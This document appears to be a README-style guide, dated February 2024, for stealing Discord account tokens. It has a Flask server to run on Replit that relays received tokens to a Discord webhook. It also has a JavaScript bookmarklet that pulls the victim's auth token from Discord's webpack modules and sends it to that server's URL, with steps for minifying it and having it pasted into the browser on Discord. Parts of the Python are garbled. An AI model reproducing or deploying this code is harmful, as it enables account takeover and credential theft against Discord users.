went downgrade a lil bit but the code works now as of 2/16/2024, this used to be more advanced and better, but some methods have been limited and dont work, this is the only part of the code that actually works now.
- sign up for replit.com and create a new python repl
- paste this code:
from dhooks import Webhook
from flask import Flask, redirect
app = Flask(__name__)
hook = Webhook(e)
def index(token):
return redirect("https://discord.com/app")
if __name__ == "__main__":
app.run(host='', port=81)
- replace PASTE_WEBHOOK_HERE with your actual discord webhook.
- click run and then copy the url
- replace PASTE_URL_HERE with the url you just copied
const url = 'PASTE_URL_HERE';
var f = (webpackChunkdiscord_app.push([[''], {}, e=> {
m = [];
for (let c in e.c) m.push(e.c[c]);
}]), m).find(m => m?.exports?.default?.getToken !== undefined).exports.default.getToken();
window.location.replace(url + '/' + f);
- copy the whole code (the short one) and then go to https://minify-js.com/ and minify the code
- then put ur code like this: javascript:(your minified code)
- will look something like this:
javascript:const url="https://b707bed2-0d5d-4175-a39f-44929c4f2e6c-00-boj7lelqbogw.kirk.replit.dev/";var f=(webpackChunkdiscord_app.push([[""],{},e=>{m=[];for(let o in e.c)m.push(e.c[o])}]),m).find((e=>void 0!==e?.exports?.default?.getToken)).exports.default.getToken();window.location.replace(url+"/"+f);
- paste and enter that code in your url tab on discord
- if need help make a issue